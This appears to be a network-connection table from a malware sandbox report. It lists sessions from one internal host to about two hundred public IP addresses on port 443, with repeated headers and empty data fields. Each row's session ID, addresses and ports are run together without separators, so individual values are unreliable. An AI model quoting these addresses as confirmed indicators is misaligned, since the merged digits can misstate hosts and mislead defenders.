                                                  20263192.168.2.1343200189.116.224.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20264192.168.2.1355418204.113.41.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20265192.168.2.1339056124.108.3.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20266192.168.2.1360842201.96.10.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20267192.168.2.1358292160.252.186.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20268192.168.2.1346886115.250.30.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20269192.168.2.136016266.102.144.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20270192.168.2.13343982.1.233.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20271192.168.2.135079431.129.177.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20272192.168.2.1345356191.232.41.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20273192.168.2.135927836.57.161.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20274192.168.2.1340564111.197.156.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20275192.168.2.1349444105.42.143.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20276192.168.2.1340138140.131.69.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20277192.168.2.133498299.36.149.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20278192.168.2.135486832.148.41.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20279192.168.2.134355014.204.35.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20280192.168.2.1335552195.145.81.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20281192.168.2.134104486.65.26.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20282192.168.2.135688461.137.214.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20283192.168.2.133734247.212.171.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20284192.168.2.1335462140.247.9.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20285192.168.2.1359990155.192.65.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20286192.168.2.1340332137.98.17.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20287192.168.2.1356262175.21.47.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20288192.168.2.1346260101.55.195.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20289192.168.2.134632445.4.141.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20290192.168.2.134189073.239.251.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20291192.168.2.1352776207.239.229.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20292192.168.2.134945249.173.134.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20293192.168.2.1342568212.128.106.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20294192.168.2.1344244213.31.132.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20295192.168.2.133836853.149.64.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20296192.168.2.1346346161.231.33.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20297192.168.2.1348176203.97.112.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20298192.168.2.1348532204.232.150.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20299192.168.2.1341092178.146.240.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20300192.168.2.1349486196.6.48.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20301192.168.2.134300661.211.216.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20302192.168.2.1332894159.162.96.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20303192.168.2.133786666.119.224.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20304192.168.2.1344038162.140.36.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20305192.168.2.1357272128.55.148.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20306192.168.2.135982020.77.163.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20307192.168.2.1353820206.114.233.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20308192.168.2.1334768211.40.132.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20309192.168.2.1342108147.214.241.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20310192.168.2.1342402126.58.205.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20311192.168.2.135902067.92.139.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20312192.168.2.1353824130.49.61.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20313192.168.2.1354484130.105.48.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20314192.168.2.135387852.159.31.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20315192.168.2.134314268.101.201.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20316192.168.2.1350956168.147.190.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20317192.168.2.136026851.20.215.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20318192.168.2.1348602197.196.175.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20319192.168.2.1345880140.12.237.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20320192.168.2.1335488140.39.150.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20321192.168.2.1352792219.57.92.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20322192.168.2.1338654162.116.88.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20323192.168.2.134283087.107.38.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20324192.168.2.1344420190.82.202.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20325192.168.2.1350138180.62.192.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20326192.168.2.1345758160.180.34.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20327192.168.2.134460264.172.250.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20328192.168.2.1332832121.62.90.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20329192.168.2.1337886208.239.166.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20330192.168.2.1341550134.239.94.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20331192.168.2.1341766195.177.39.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20332192.168.2.135214047.28.145.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20333192.168.2.1336142207.244.230.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20334192.168.2.1349620205.68.197.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20335192.168.2.1333628175.170.60.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20336192.168.2.1339008165.155.199.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20337192.168.2.135785219.252.155.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20338192.168.2.1335338142.81.54.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20339192.168.2.1358254201.243.75.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20340192.168.2.134023494.165.183.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20341192.168.2.136062632.112.44.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20342192.168.2.1337848167.139.113.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20343192.168.2.134129439.31.98.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20344192.168.2.135699269.92.163.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20345192.168.2.1345548182.82.164.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20346192.168.2.1350678106.89.154.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20347192.168.2.1349672129.225.243.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20348192.168.2.134731495.24.226.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20349192.168.2.135952272.228.96.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20350192.168.2.134476697.111.142.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20351192.168.2.134400275.121.105.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20352192.168.2.1346480180.96.117.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20353192.168.2.1351838117.198.136.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20354192.168.2.1344416125.209.139.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20355192.168.2.135448671.109.98.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20356192.168.2.133342213.161.173.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20357192.168.2.1343814178.103.252.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20358192.168.2.1346760197.152.206.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20359192.168.2.1348250168.130.11.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20360192.168.2.1342476206.147.68.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20361192.168.2.1360812209.150.2.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20362192.168.2.1357930108.156.77.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20363192.168.2.1335942166.140.32.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20364192.168.2.133700618.156.42.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20365192.168.2.133393880.202.125.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20366192.168.2.135698887.192.75.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20367192.168.2.1358570122.93.170.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20368192.168.2.1349452117.113.98.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20369192.168.2.1357108219.230.7.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20370192.168.2.1353978186.121.201.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20371192.168.2.1345998197.150.8.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20372192.168.2.1340816141.80.201.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20373192.168.2.1344904209.106.194.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20374192.168.2.1337842120.34.217.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20375192.168.2.1348334166.116.57.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20376192.168.2.1351670210.131.204.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20377192.168.2.1338096107.27.11.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20378192.168.2.1357610204.203.12.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20379192.168.2.1346278178.6.94.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20380192.168.2.135546841.163.119.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20381192.168.2.1336552170.175.135.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20382192.168.2.1342348158.174.27.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20383192.168.2.134113289.85.13.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20384192.168.2.1345520153.59.26.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20385192.168.2.1357366195.113.218.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20386192.168.2.1359110170.150.36.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20387192.168.2.1336362203.187.45.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20388192.168.2.134123697.114.147.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20389192.168.2.1339298171.169.139.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20390192.168.2.1351238136.158.102.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20391192.168.2.1343740103.177.136.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20392192.168.2.133642064.101.12.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20393192.168.2.1353614168.238.44.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20394192.168.2.1339338183.138.239.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20395192.168.2.1340330121.248.229.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20396192.168.2.1357626151.132.242.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20397192.168.2.1347526157.230.51.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20398192.168.2.135250236.38.97.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20399192.168.2.1359222136.28.238.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20400192.168.2.1359068164.77.5.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20401192.168.2.133486073.190.212.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20402192.168.2.133332644.127.3.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20403192.168.2.1340952120.227.170.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20404192.168.2.1353200137.217.175.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20405192.168.2.1342382163.122.9.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20406192.168.2.135470881.25.179.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20407192.168.2.1339412144.199.18.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20408192.168.2.1337096191.58.111.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20409192.168.2.133499667.163.87.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20410192.168.2.134931073.45.96.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20411192.168.2.1355320148.224.127.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20412192.168.2.1352140147.93.239.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20413192.168.2.133548075.212.122.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20414192.168.2.1340182167.217.71.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20415192.168.2.1358654210.19.20.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20416192.168.2.1355534211.139.255.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20417192.168.2.135436265.88.107.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20418192.168.2.135934695.147.8.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20419192.168.2.135762491.87.135.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20420192.168.2.134070869.153.186.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20421192.168.2.1351694204.21.24.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20422192.168.2.1343084203.241.58.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20423192.168.2.1333348173.115.30.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20424192.168.2.1341292117.49.68.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20425192.168.2.134854839.152.118.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20426192.168.2.1354454133.212.60.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20427192.168.2.133997879.236.218.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20428192.168.2.1356208151.186.118.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20429192.168.2.134503887.167.123.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20430192.168.2.1342620146.250.65.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20431192.168.2.1354210181.165.207.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20432192.168.2.1337704219.126.7.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20433192.168.2.1358244111.85.23.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20434192.168.2.135770694.195.218.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20435192.168.2.1354798122.5.107.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20436192.168.2.136061812.30.34.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20437192.168.2.1354932216.203.171.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20438192.168.2.1343398169.153.243.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20439192.168.2.135755875.35.65.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20440192.168.2.134005484.145.116.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20441192.168.2.1352358132.32.159.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20442192.168.2.134531859.91.131.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20443192.168.2.13353645.214.88.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20444192.168.2.135601679.193.210.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20445192.168.2.1335662211.69.205.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20446192.168.2.134024093.112.90.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20447192.168.2.1359530112.188.98.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20448192.168.2.135193682.238.168.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20449192.168.2.135019486.178.85.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20450192.168.2.1355620162.95.221.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20451192.168.2.13373688.141.73.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20452192.168.2.133454288.36.167.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20453192.168.2.133506482.96.230.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20454192.168.2.133653871.87.177.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20455192.168.2.134527881.108.48.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20456192.168.2.1357100202.191.64.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20457192.168.2.1354636222.75.156.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20458192.168.2.1350040110.203.1.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20459192.168.2.1356028165.149.10.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20460192.168.2.134301080.35.160.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20461192.168.2.13521885.48.135.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20462192.168.2.136097814.100.32.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20463192.168.2.1343694210.214.133.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20464192.168.2.134221223.191.120.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20465192.168.2.1351890213.111.234.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20466192.168.2.133769423.5.238.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20467192.168.2.1333822210.152.40.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20468192.168.2.134961683.113.39.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20469192.168.2.1339912115.1.162.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20470192.168.2.1345010110.242.229.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20471192.168.2.133380491.24.92.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20472192.168.2.1353394179.4.37.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20473192.168.2.1333208111.186.143.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20474192.168.2.1338268208.6.9.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20475192.168.2.1335124196.248.147.245443
